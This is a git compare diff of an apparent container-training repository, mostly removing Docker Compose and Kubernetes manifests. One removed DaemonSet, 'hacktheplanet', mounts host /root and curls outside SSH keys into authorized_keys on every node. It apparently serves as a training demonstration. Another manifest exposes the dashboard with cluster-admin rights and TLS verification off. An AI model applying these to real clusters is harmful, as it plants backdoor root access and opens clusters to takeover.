Compare commits


2 Commits

Author SHA1 Message Date
Jerome Petazzoni
f01bc2a7a9 Fix overlapping slide number and pics 2018-09-29 18:54:00 -05:00
Jerome Petazzoni
3eaa844c55 Add ENIX logo
Warning: do not merge this branch to your content, otherwise you
will get the ENIX logo in the top right of all your decks
2018-09-08 07:49:38 -05:00
271 changed files with 2399 additions and 47031 deletions

.gitignore
View File

@@ -1,22 +1,13 @@
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
prepare-vms/infra
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
node_modules
### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride
### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

View File

@@ -199,7 +199,7 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,2 +0,0 @@
hostname frr
log stdout

View File

@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr

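For context: this deleted Compose file drove the two FRR configs above (what appear to be bgpd and zebra configs). A minimal sketch of how they fit together, assuming the configs are restored under ./conf and an empty ./run directory exists for the FRR control sockets:

```bash
# bring up the chmod helper, zebra, and the BGP daemon
docker-compose up -d chmod zebra bgpd
# the one-shot vtysh service dumps the BGP table and exits
docker-compose run --rm vtysh
```
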
View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

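The service whose name reads "Edit the CLUSTER placeholder first…" is a deliberate tripwire: Compose refuses the file until the pod CIDR is filled in and the line is removed. A sketch of the intended edit, assuming a cluster number of 99 and that the file is saved as kube.yaml (both assumptions, not givens):

```bash
# drop the tripwire line, then substitute the CLUSTER placeholder
sed -i -e '/placeholder/d' -e 's/10\.CLUSTER\.0\.0/10.99.0.0/' kube.yaml
docker-compose -f kube.yaml up -d
```
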
View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
tier: node
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
tier: node
name: kube-router
namespace: kube-system
spec:
template:
metadata:
labels:
k8s-app: kube-router
tier: node
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg

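This deleted kube-router manifest carries two tripwires: the bogus leading YAML document and the --master=http://X.X.X.X:8080 flag, where X.X.X.X is deliberately left unresolved. A sketch of the fix-up, assuming the API server from the Compose file above answers on 10.0.0.1:8080 and the manifest is saved as kuberouter.yaml (both made up for illustration):

```bash
# remove the warning document at the top of the file first, then
# point kube-router at the API server
sed -i 's|http://X\.X\.X\.X:8080|http://10.0.0.1:8080|' kuberouter.yaml
kubectl apply -f kuberouter.yaml
kubectl -n kube-system get pods -l k8s-app=kube-router
```
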
View File

@@ -1,28 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

View File

@@ -5,3 +5,6 @@ RUN gem install thin
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80
HEALTHCHECK \
--interval=1s --timeout=2s --retries=3 --start-period=1s \
CMD curl http://localhost/ || exit 1

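The HEALTHCHECK added above makes Docker probe the hasher every second. A quick way to see it in action, assuming curl is present in the image (the check always fails otherwise):

```bash
docker build -t hasher .
docker run -d --name hasher hasher
# the status goes "starting" -> "healthy" once the probe succeeds
docker inspect --format '{{ .State.Health.Status }}' hasher
```
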
View File

@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:

View File

@@ -1,90 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: consul
labels:
app: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
labels:
app: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

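This deleted manifest bootstraps a three-node Consul cluster via the k8s retry-join provider (hence the RBAC objects granting pod get/list). A minimal smoke test, assuming it is restored as consul.yaml (a hypothetical filename):

```bash
kubectl apply -f consul.yaml
kubectl rollout status statefulset consul
# all three members should show up as alive once bootstrap completes
kubectl exec consul-0 -- consul members
```
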
View File

@@ -1,28 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: build-image
spec:
restartPolicy: OnFailure
containers:
- name: docker-build
image: docker
env:
- name: REGISTRY_PORT
value: #"30000"
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
mkdir /workspace &&
git clone https://github.com/jpetazzo/container.training /workspace &&
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
docker push localhost:$REGISTRY_PORT/worker
volumeMounts:
- name: docker-socket
mountPath: /var/run/docker.sock
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock

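The REGISTRY_PORT value above is commented out on purpose; the pod will not work until it is set. A sketch, assuming the manifest is saved as build-image.yaml and the in-cluster registry is published on NodePort 30000 (the commented-out placeholder hints at this, but it is not a given):

```bash
# uncomment the value line first, e.g.  value: "30000"
kubectl apply -f build-image.yaml
# follow the docker build/push driven through the host's Docker socket
kubectl logs --follow build-image
```
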
View File

@@ -3,6 +3,7 @@ apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
@@ -18,6 +19,7 @@ rules:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
@@ -31,18 +33,23 @@ subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: fluentd
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
template:
metadata:
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
@@ -51,7 +58,7 @@ spec:
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
image: fluent/fluentd-kubernetes-daemonset:elasticsearch
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
@@ -59,12 +66,12 @@ spec:
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
# X-Pack Authentication
# =====================
- name: FLUENT_ELASTICSEARCH_USER
value: "elastic"
- name: FLUENT_ELASTICSEARCH_PASSWORD
value: "changeme"
resources:
limits:
memory: 200Mi
@@ -85,83 +92,131 @@ spec:
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: elasticsearch
run: elasticsearch
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
spec:
containers:
- image: elasticsearch:5
- image: elasticsearch:5.6.8
imagePullPolicy: IfNotPresent
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
selfLink: /api/v1/namespaces/default/services/elasticsearch
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
run: elasticsearch
sessionAffinity: None
type: ClusterIP
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: kibana
run: kibana
name: kibana
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: kibana
run: kibana
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
image: kibana:5.6.8
imagePullPolicy: Always
name: kibana
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
name: kibana
selfLink: /api/v1/namespaces/default/services/kibana
spec:
externalTrafficPolicy: Cluster
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
run: kibana
sessionAffinity: None
type: NodePort

View File

@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"

View File

@@ -1,94 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator

View File

@@ -1,167 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "apk update && apk add curl && curl https://github.com/bridgetkromhout.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,18 +0,0 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
frontend the-frontend
bind *:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check

View File

@@ -1,16 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: haproxy
spec:
volumes:
- name: config
configMap:
name: haproxy
containers:
- name: haproxy
image: haproxy
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/

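The deleted haproxy.cfg above and this pod go together: the pod expects the config in a ConfigMap named haproxy, mounted where the haproxy image looks for haproxy.cfg. A sketch, assuming the two files are restored as haproxy.cfg and haproxy-pod.yaml (hypothetical filenames):

```bash
kubectl create configmap haproxy --from-file=haproxy.cfg
kubectl apply -f haproxy-pod.yaml
# the TCP frontend on port 80 round-robins to the two example backends
kubectl port-forward pod/haproxy 8080:80 &
curl -sI http://localhost:8080 | head -1
```
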
View File

@@ -1,14 +0,0 @@
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: cheddar
spec:
rules:
- host: cheddar.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: cheddar
servicePort: 80

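A.B.C.D is a deliberate placeholder for the address of a node running the ingress controller; it is not meant to resolve as-is. A sketch, assuming a node address of 192.0.2.10 and the manifest saved as cheddar-ingress.yaml (both made up):

```bash
sed -i 's/A\.B\.C\.D/192.0.2.10/' cheddar-ingress.yaml
kubectl apply -f cheddar-ingress.yaml
# nip.io resolves the embedded address, so no DNS setup is needed
curl http://cheddar.192.0.2.10.nip.io
```
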
View File

@@ -1,220 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

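The second half of this manifest wraps the official dashboard in a socat pod that strips TLS (verify=0) and exposes it over a NodePort while binding the dashboard to cluster-admin, which is an intentionally insecure demo setup. To find where it landed, assuming it was applied as-is:

```bash
# look up the NodePort the socat proxy was published on
NODEPORT=$(kubectl get service dashboard -o jsonpath='{.spec.ports[0].nodePort}')
curl -sI http://localhost:$NODEPORT | head -1   # run from any node
```
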
View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx

View File

@@ -1,29 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: kaniko-build
spec:
initContainers:
- name: git-clone
image: alpine
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
git clone git://github.com/jpetazzo/container.training /workspace
volumeMounts:
- name: workspace
mountPath: /workspace
containers:
- name: build-image
image: gcr.io/kaniko-project/executor:latest
args:
- "--context=/workspace/dockercoins/rng"
- "--insecure"
- "--destination=registry:5000/rng-kaniko:latest"
volumeMounts:
- name: workspace
mountPath: /workspace
volumes:
- name: workspace

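The volumes section above looks truncated in this view; the workspace volume presumably ended with an emptyDir: {} source. Assuming that, and the manifest saved as kaniko-build.yaml (a hypothetical filename), a sketch of running the build:

```bash
kubectl apply -f kaniko-build.yaml
# the init container clones the repo, then kaniko builds and pushes
# (a registry must answer in-cluster at registry:5000 for the push)
kubectl logs --follow kaniko-build -c build-image
```
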
View File

